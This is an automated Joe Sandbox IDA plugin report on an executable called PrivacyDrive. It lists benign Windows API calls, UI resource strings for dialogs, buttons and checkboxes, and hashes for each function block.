                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: BUTTON_OK$BUTTON_STOP$CHECKBOX_AUTO_CLOSE$CREATING_VOLUME$Dialog$LABEL_COMPLETED$LABEL_DAY$LABEL_ELAPSED_TIME$LABEL_REMAINING_TIME$LABEL_SPEED$PZ$STRING_SEC
                                • API String ID: 2978645861-3884833104
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 0041B260
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0041B278
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,DIALOG_EXPAND), ref: 0041B2A5
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0041B2B7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,DIALOG_EXPAND), ref: 0041B2E4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0041B2F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Button$DIALOG_EXPAND$IMG_ARROW_HIT_DOWN$IMG_ARROW_HIT_UP$IMG_ARROW_NORMAL_DOWN$IMG_ARROW_NORMAL_UP$IMG_BUTTON_HIT$IMG_BUTTON_NORMAL$IMG_BUTTON_PUSH$PM_BORDER$PM_HEIGHT
                                • API String ID: 904232820-730490805
                                • Opcode ID: 0a707aea084ef99030b8f85b3a938d66ff42589019587328b4cc63533453426a
                                • Instruction ID: 11b5f008a0bab000d85bfe6aabd39e875f0e977299389ebaf7c90ea5c12af504
                                • Opcode Fuzzy Hash: 0a707aea084ef99030b8f85b3a938d66ff42589019587328b4cc63533453426a
                                • Instruction Fuzzy Hash: DF317E7038070667E614A7328C53FEB6A94FF50B45F05042FBA56E62D1FFD8E850C6A9
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 0043B0B0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0043B0C8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,FRAME_BUTTON), ref: 0043B0F5
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0043B107
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,?,FRAME_BUTTON), ref: 0043B134
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0043B146
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Button$FRAME_BUTTON$IMG_CLOSE_ICON$IMG_CLOSE_ICON_B$IMG_HIDE_ICON$IMG_MAXIMIZE_ICON$IMG_MAXIMIZE_ICON_2$IMG_MAXIMIZE_ICON_2B$IMG_MAXIMIZE_ICON_B$IMG_MINIMIZE_ICON$IMG_MINIMIZE_ICON_B
                                • API String ID: 904232820-3307000364
                                • Opcode ID: 83c5b8bb67f0ae4b3de67eb1b1a33e3331752b4c9c3ddd21483f26a95269ca02
                                • Instruction ID: ae8332686b30e96149a427469382f687029e1379bd36c23878b8f88bf8a8bd2f
                                • Opcode Fuzzy Hash: 83c5b8bb67f0ae4b3de67eb1b1a33e3331752b4c9c3ddd21483f26a95269ca02
                                • Instruction Fuzzy Hash: 85319670384B0167E6506232AC06F7F6AA4BF54B46F04451FB789DA2C1FFD8EC00D6A9
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,0046799E,?,?,?,?,?,00416FD7,?,?,00004E24,?,?), ref: 00467810
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00416FD7,?,?,00004E24,?,?,00000001,00000001,00000000,?,00004E23), ref: 00467828
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,CheckBox,?,STANDARD,?,?,?,?,00416FD7,?,?,00004E24,?,?,00000001), ref: 00467855
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00416FD7,?,?,00004E24,?,?,00000001,00000001,00000000,?,00004E23), ref: 00467867
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,CheckBox,?,STANDARD,?,?,?,?,00416FD7,?,?,00004E24,?,?,00000001), ref: 00467894
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00416FD7,?,?,00004E24,?,?,00000001,00000001,00000000,?,00004E23), ref: 004678A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CheckBox$IMG_FALSE_DISABLED$IMG_FALSE_HIT$IMG_FALSE_NORMAL$IMG_MIX_DISABLED$IMG_MIX_HIT$IMG_MIX_NORMAL$IMG_TRUE_DISABLED$IMG_TRUE_HIT$IMG_TRUE_NORMAL$STANDARD
                                • API String ID: 904232820-3637807266
                                • Opcode ID: 8fb17536e8b4ead56b5290bd40afe8e34491561d750b738c4d215767a7589741
                                • Instruction ID: f7ad346479b9b53a794ad72869dacbe2bb623c799672af52881e4c440d7ad630
                                • Opcode Fuzzy Hash: 8fb17536e8b4ead56b5290bd40afe8e34491561d750b738c4d215767a7589741
                                • Instruction Fuzzy Hash: C63152703C470167EB1066725C02FAB6AD87F51B49F08452FBA49D62C1FEDCEC049A69
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception
                                • String ID: !@$%c:$0004$0016$0019$0023$0044$0045$0052$0053$invalid string position
                                • API String ID: 3728558374-380519356
                                • Opcode ID: fb1a3b4c621964309793fbac6483950868ff512b5d9397d9f71006edde34317c
                                • Instruction ID: b53a1559ec5fce48767fb9fb50009b447b2e265dac9f65a9b331509fc4851b15
                                • Opcode Fuzzy Hash: fb1a3b4c621964309793fbac6483950868ff512b5d9397d9f71006edde34317c
                                • Instruction Fuzzy Hash: 84129170A00209EEEF10DF95CD4ABEEBBB9BF18319F10412AF515B61D0E7B46A44CB65
                                APIs
                                • _memset.LIBCMT ref: 004209DF
                                • GetOpenFileNameW.COMDLG32(?,?,?,00000000,?,?,?,?,Window\ToolBar\Class,MAIN_FRAME|HOME|MOUNT,?,?,?,00412591), ref: 00420A61
                                • lstrcpynW.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,Window\ToolBar\Class,MAIN_FRAME|HOME|MOUNT,?,?,?,00412591), ref: 00420A8F
                                • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,?,Window\ToolBar\Class,MAIN_FRAME|HOME|MOUNT,?,?,?,00412591), ref: 00420AB7
                                • _memset.LIBCMT ref: 00420B3F
                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,Window\ToolBar\Class,MAIN_FRAME|HOME|MOUNT), ref: 00420B55
                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,Window\ToolBar\Class,MAIN_FRAME|HOME|MOUNT), ref: 00420B5F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memsetlstrcat$FileNameOpenlstrcpynlstrlen
                                • String ID: ADD_TO_FAVORITES$CheckBox$Dialog$OPEN_FILE$\
                                • API String ID: 1129419596-541678159
                                • Opcode ID: 401d60ef948c7a465d402e30fac01c54088480a09c38c91bb1510d80beebc875
                                • Instruction ID: 7c5d638c8ad4967e5d53c3804e16a683b9c30670738ba330edc928e4d93e01f9
                                • Opcode Fuzzy Hash: 401d60ef948c7a465d402e30fac01c54088480a09c38c91bb1510d80beebc875
                                • Instruction Fuzzy Hash: AC71DE74A007199FCB20DF55DC49B9BBBF8FF45304F00456AE80993280E7B8AA98CF95
                                APIs
                                • GetDC.USER32(00000000), ref: 0042996C
                                • EnumFontFamiliesW.GDI32(00000000,00000000,00429950,00000000,name,00000000,00000002,Font\FontName,DEFAULT|PRIORITY_1,?,00000000,00000000,00429B2B,7563D392,?,00000000), ref: 004299E7
                                • EnumFontFamiliesW.GDI32(00000000,00000000,00429950,00000000,name,00000000,00000002,Font\FontName,DEFAULT|PRIORITY_2,Font\FontName,DEFAULT|PRIORITY_1,?,00000000,00000000,00429B2B,7563D392), ref: 00429A63
                                • EnumFontFamiliesW.GDI32(00000000,00000000,00429950,00000000,name,00000000,Font\FontName,DEFAULT|PRIORITY_3,Font\FontName,DEFAULT|PRIORITY_2,Font\FontName,DEFAULT|PRIORITY_1,?,00000000,00000000,00429B2B), ref: 00429AAD
                                • ReleaseDC.USER32(00000000,00000000), ref: 00429AC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: EnumFamiliesFont$Release
                                • String ID: $[$$[$([$([$DEFAULT|PRIORITY_1$DEFAULT|PRIORITY_2$DEFAULT|PRIORITY_3$Font\FontName$name
                                • API String ID: 2372228163-2114572919
                                • Opcode ID: a0da90b5ef834a16701418d2769278927caed07de6752e9ec8dae29241cda6b9
                                • Instruction ID: 63894a0de4745de5f54533c513a582d59f4943c8890529a85303b5c574597c44
                                • Opcode Fuzzy Hash: a0da90b5ef834a16701418d2769278927caed07de6752e9ec8dae29241cda6b9
                                • Instruction Fuzzy Hash: C631AC30301360ABEB785A177C5FFE75D99EB42B62F94042FB60A913D1C75C9C44E26A
                                APIs
                                • GetParent.USER32(00000000), ref: 004A0221
                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004A0242
                                • SendMessageW.USER32(00000000,00000121,00000000,00000000), ref: 004A0260
                                • Sleep.KERNEL32(0000000A), ref: 004A0268
                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004A0276
                                • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004A028A
                                • Sleep.KERNEL32(0000000A), ref: 004A02C1
                                • TranslateMessage.USER32(00000000), ref: 004A02C7
                                • DispatchMessageW.USER32(00000000), ref: 004A02D1
                                • TranslateMessage.USER32(00000000), ref: 004A02FA
                                • DispatchMessageW.USER32(00000000), ref: 004A0304
                                • PostQuitMessage.USER32(00000000), ref: 004A030E
                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004A0320
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Message$Peek$DispatchSleepTranslate$ParentPostQuitSend
                                • String ID: p
                                • API String ID: 3558860194-2181537457
                                • Opcode ID: 3ad98564f9217dad67eb4cc8d1695be8ae595c90c57b1d42db7e0a873f5566b0
                                • Instruction ID: a3fbdd8ff4268c024b1367fc26ad39c1584acc8a4865cc4e2d2fc97986039eed
                                • Opcode Fuzzy Hash: 3ad98564f9217dad67eb4cc8d1695be8ae595c90c57b1d42db7e0a873f5566b0
                                • Instruction Fuzzy Hash: 9A310A31A40309AFEF209BA0CC49FEE7778EB2A711F140466F601E62D0D778A945DB69
                                APIs
                                • GetParent.USER32(00000000), ref: 004183C1
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004183E2
                                • SendMessageW.USER32(00000000,00000121,00000000,00000000), ref: 00418400
                                • Sleep.KERNEL32(00000005,?,?,?,00418332,00000000,?,?), ref: 00418408
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00418416
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041842A
                                • Sleep.KERNEL32(0000000A,?,?,?,00418332,00000000,?,?), ref: 00418461
                                • TranslateMessage.USER32(?), ref: 00418467
                                • DispatchMessageW.USER32(?), ref: 00418471
                                • TranslateMessage.USER32(?), ref: 0041849A
                                • DispatchMessageW.USER32(?), ref: 004184A4
                                • PostQuitMessage.USER32(00000000), ref: 004184AE
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004184C0
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Message$Peek$DispatchSleepTranslate$ParentPostQuitSend
                                • String ID: p
                                • API String ID: 3558860194-2181537457
                                • Opcode ID: ad4554fbc41f7c899fdbae2d57b079ac61dafef2fa67099c461952b4773f50a4
                                • Instruction ID: e94e9c10f76434120f8662620c792d8805317a7a4b21368f9c37895cfdad71a7
                                • Opcode Fuzzy Hash: ad4554fbc41f7c899fdbae2d57b079ac61dafef2fa67099c461952b4773f50a4
                                • Instruction Fuzzy Hash: 9B310E31A40309AFEF109BA0DC49FEE7768BB19711F54042AF601E6290EF78A945DB69
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,00000000,?,00416CCC,00000000,?,Version.xml,?,?), ref: 0049FA20
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00000000,?,00416CCC,00000000,?,Version.xml,?,?), ref: 0049FA38
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,BASE_DIALOG,?,00000000,?,00416CCC,00000000,?,Version.xml,?,?), ref: 0049FA65
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00000000,?,00416CCC,00000000,?,Version.xml,?,?), ref: 0049FA77
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,BASE_DIALOG,?,00000000,?,00416CCC,00000000,?,Version.xml,?,?), ref: 0049FAA4
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00000000,?,00416CCC,00000000,?,Version.xml,?,?), ref: 0049FAB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: BASE_DIALOG$BUTTON_BOTTOM$BUTTON_HEIGHT$BUTTON_INTERVAL$BUTTON_RIGHT$DOTLINE_BOTTOM$DOTLINE_HIGH$DOTLINE_LOW$DOTLINE_LR$Dialog
                                • API String ID: 904232820-2733251250
                                • Opcode ID: 4ecdd1dee56623e85ebe5f008afd0818b57f3bbd8557e8fb14c12586452e16f1
                                • Instruction ID: ab4ad8203706a241e30d807307d16b7b1518f7673a2a10b7ca18abe6edba17c8
                                • Opcode Fuzzy Hash: 4ecdd1dee56623e85ebe5f008afd0818b57f3bbd8557e8fb14c12586452e16f1
                                • Instruction Fuzzy Hash: 82312334784702A6EE44A7718C62F666E547B48F55F44023ABB09E62C1EFD8F804C7A9
                                APIs
                                  • Part of subcall function 004A6F60: EnterCriticalSection.KERNEL32(005BE2CC,0049B07A,0049B078), ref: 004A7032
                                  • Part of subcall function 004A6F60: LeaveCriticalSection.KERNEL32(?,?,?), ref: 004A70D6
                                  • Part of subcall function 0040D860: _memmove.LIBCMT ref: 0040D911
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00414AE9
                                • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00414B16
                                • GetFileSizeEx.KERNEL32(00010000,?), ref: 00414B3B
                                • CloseHandle.KERNEL32(?), ref: 00414B4D
                                • SetLastError.KERNEL32(00000072,00000000,?), ref: 00414BC8
                                • CloseHandle.KERNEL32(?), ref: 00414BD8
                                • GetLastError.KERNEL32 ref: 00414C37
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414C63
                                • LocalFree.KERNEL32(?), ref: 00414C8F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: File$CloseCriticalErrorHandleLastSection$CreateEnterFormatFreeLeaveLocalMessageReadSize_memmove
                                • String ID: 0007$0029$0036$0049
                                • API String ID: 1440858197-249027932
                                • Opcode ID: e91b2718b8bad974ffd6ca7410dfe79f71b48452929474bb0ac99993b6884a91
                                • Instruction ID: f0adc23a86ddd49354d18f217ef62bd7658484890113a0c4d8c6d7e2c6b58bcc
                                • Opcode Fuzzy Hash: e91b2718b8bad974ffd6ca7410dfe79f71b48452929474bb0ac99993b6884a91
                                • Instruction Fuzzy Hash: 32B19E31244301ABD720DF61C895FAB77E8AF94714F00052EFA569B2D1EB78E884CB5A
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC), ref: 004169B8
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,SPLASH), ref: 004169DF
                                • LeaveCriticalSection.KERNEL32(005BDCCC,00000006,CHECKBOX_DONT_SHOW,00000005,MOUNT_DESCRIPTION,00000004,OPEN_DESCRIPTION,00000003,CREATE_DESCRIPTION,00000002,BUTTON_MOUNT,00000001,BUTTON_OPEN,00000000,BUTTON_CREATE,Dialog), ref: 00416A76
                                Strings
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: BUTTON_CREATE$BUTTON_MOUNT$BUTTON_OPEN$CHECKBOX_DONT_SHOW$CREATE_DESCRIPTION$Dialog$MOUNT_DESCRIPTION$OPEN_DESCRIPTION$PZ$SPLASH
                                • API String ID: 2978645861-117737115
                                • Opcode ID: 12ce248860e5816645ae96685624a902db5279d354596f054e2eb9af7a76a84d
                                • Instruction ID: b4d47b6eeb43621f850348c69b08b960bdc31d729547f46b50674d169dabf746
                                • Opcode Fuzzy Hash: 12ce248860e5816645ae96685624a902db5279d354596f054e2eb9af7a76a84d
                                • Instruction Fuzzy Hash: 2211DB7439171123EE5526326D2BBEF1C466B55F45F05041AFB01EA2C2FFDACD8282AE
                                APIs
                                • GdipCreateRegion.GDIPLUS ref: 0042D569
                                • GdipGetClip.GDIPLUS(?,?), ref: 0042D58D
                                • GdipSetClipRectI.GDIPLUS(?,00000000,00000000,?,?,00000004), ref: 0042D5B5
                                • GdipCreatePath.GDIPLUS(00000000,?), ref: 0042D5D7
                                • GdipCreatePathGradientFromPath.GDIPLUS(?,?), ref: 0042D665
                                • GdipSetPathGradientFocusScales.GDIPLUS(?,?,?,7563D392), ref: 0042D6DA
                                • GdipFillPath.GDIPLUS(?,?,?,?,?,7563D392), ref: 0042D6FE
